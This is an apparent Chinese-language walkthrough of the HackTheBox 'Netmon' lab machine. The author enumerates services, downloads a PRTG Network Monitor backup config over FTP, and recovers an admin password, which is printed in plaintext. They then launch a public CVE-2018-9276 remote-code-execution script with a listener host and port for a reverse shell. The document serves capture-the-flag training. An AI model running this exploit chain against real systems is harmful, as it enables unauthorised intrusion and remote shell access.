Netmon - HackTheBox
Td

image

nmap扫描

image

image

先看80

image

左下方发现了程序名字prtg network monitor和版本18.1.37,搜一下看看

image

就一个rce,还是需要账号密码

在看看21

image

貌似,有点直接

image

网站目录下没有任何文件

https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data

在这发现了目录路径

image

image

.bak貌似是个备份文件,下载下来

wget http://10.10.10.152/ProgramData/Paessler/PRTG Network Monitor/PRTG Configuration.old.bak

image

找着密码了

image

还是不对,搜了wp才知道,这玩意是备份密码,现在的密码把2018改成了2019,这谁想得到啊

PrTg@dmin2019

登录后台,现在有了账号密码,去试试那个rce

https://github.com/A1vinSmith/CVE-2018-9276

python cve.py -i 10.10.10.152 -p 80 --lhost 10.10.14.12 --lport 7777 --user prtgadmin --password 'PrTg@dmin2019'

image

image

image